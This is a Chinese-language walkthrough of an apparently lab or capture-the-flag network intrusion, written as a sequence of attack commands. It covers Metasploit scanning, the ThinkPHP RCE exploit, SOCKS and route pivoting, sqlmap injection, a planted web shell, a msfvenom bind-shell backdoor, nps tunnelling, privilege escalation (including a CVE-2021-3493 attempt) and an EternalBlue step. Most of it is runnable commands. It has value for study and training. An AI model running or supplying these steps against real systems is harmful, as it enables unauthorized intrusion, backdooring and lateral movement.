代理工具用nps工具,msf的代理工具不稳定
利用msf工具
攻击机kali ip地址:192.168.23.129
信息收集
主机发现:
模块:auxiliary/scanner/discovery/arp_sweep
操作命令
利用探测模块
use auxiliary/scanner/discovery/arp_sweep
查看参数
show options
set RHOSTS 192.168.23.0/24
运行模块
run
返回探测结果
主机为1,2为网关,得到存活主机ip:192.168.23.141
目标机为:192.168.23.141
进一步探测进行端口扫描
模块:auxiliary/scanner/portscan/tcp
操作命令
利用端口探测模块:
use auxiliary/scanner/portscan/tcp
查看参数:
show options
设置探测ip地址RHOSTS
set RHOSTS 192.168.23.141
运行模块
run
返回探测结果
去网页访问80端口
得到80端口的服务版本
thinkphp攻击模块:exploit/unix/webapp/thinkphp_rce
操作命令
利用模块:
use exploit/unix/webapp/thinkphp_rce
查看参数:
show options
设置参数:
set RHOSTS 192.168.23.141
set LHOST 192.168.23.143
set RPORT 80
执行
run
获取shell
进入meterpreter 查看主机
查看ip
发现有第二块网卡
进行内网穿透
模块:auxiliary/server/socks_proxy
设置srvhost和srvport 为kali的IP地址和端口
查看是否监听
进行路由转发: post/multi/manage/autoroute
设置好session后会自动添加路由
查看路由信息 route
然后打开proxychains的配置文件 /etc/proxychains4.conf 添加socks代理信息
因为msf中设置的socks版本是5,所以添加socks5:
代理配置完成扫描c段看看是否还存在存活主机过程略
发现存在192.168.22.129主机存活
访问192.168.22.129
返回网页反现提示sql注入点和cms版本信息
用GOOGLE浏览器设置代理
访问192.168.22.129
进行sqlmap爆破
解密登陆后台
http://192.168.22.129/index.php?r=admini/public/login后台地址(御剑扫出)
admin
123qwe
得到flag
写入一句话木马
配置蚁剑代理
连接
获取flag
继续传马在msf拿shell,不过目标是在192.168.22.0网段,主动连我们肯定是连不上的,所以这里需要正向连,msf去连它
生成正向后门木马为
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > 3.elf
通过蚁剑上传到目标机上更改权限为0777
打开窗口执行3.elf文件
(执行前)启用监听
use exploit/multi/handler
设置payload
set payload linux/x64/meterpreter/bind_tcp
set RHOST 192.168.22.129
设置监听端口
3333
启用监听
exploit
成功登入查看版本
发现新的ip
获取网络接口:run get_local_subnets
添加路由地址:run autoroute -s 192.168.33.0/24
查看路由地址:run autoroute -p
由于以上连接不稳定更改代理工具,重新进行渗透
配置nps工具
mkdir -p /nps/server #创建多级目录
cd /nps/server
#下载到server目录下并解压
wget https://github.com/ehang-io/nps/releases/download/v0.26.9/linux_386_server.tar.gz
tar -zxvf linux_386_server.tar.gz
#解压后会含有一下目录及文件
# conf nps web
下载完服务器压缩包后,解压,然后进入解压后的文件夹
执行安装命令
./nps install
配置文件在 /etc/nps/conf/nps.conf ,只需要修改下面的web的host、账号、密码和端口号即可,其他可保持不变
admin
123
8088(端口号)
启动nps
nps start
参考文档
重新进行渗透对每个靶机上传客户端nps发现没有权限执行
Target1进行提权
save保存设置的参数
post/multi/recon/local_exploit_suggester模块查找可利用session提权
可提权
设置参数
角色为root提权成功
Flag
部署代理
交互命令
python -c 'import pty;pty.spawn("/bin/bash")'
上传nps客户端解压安装
执行命令
开启
页面
开新窗口
Kali的流量会通过代理1流向靶机2
获取2的root过程同上
还是利用multi/recon/local_exploit_suggester通过sessio获取root
未能获取权限
挂代理添加路由同上
访问192.168.33.128
能通
进行同段扫描
Target3
尝试扫描33网段
proxychains4 nmap -Pn -sT 192.168.33.33
发现开放着3389,445端口等这是windows系统利用永恒之蓝
这里nps不成功重新安装kali ip为192.168.23.143利用proxychains4 socks5进行代理
重新添加
用multi/recon/local_exploit_suggester利用sessio 2进行查找提权
发现用liunx2023.3版本可以查找出提权模块
利用exploit/linux/local/cve_2021_3493_overlayfs提权payload失败
略过提权进行渗透对windows渗透可以ping通
进行永恒之蓝渗透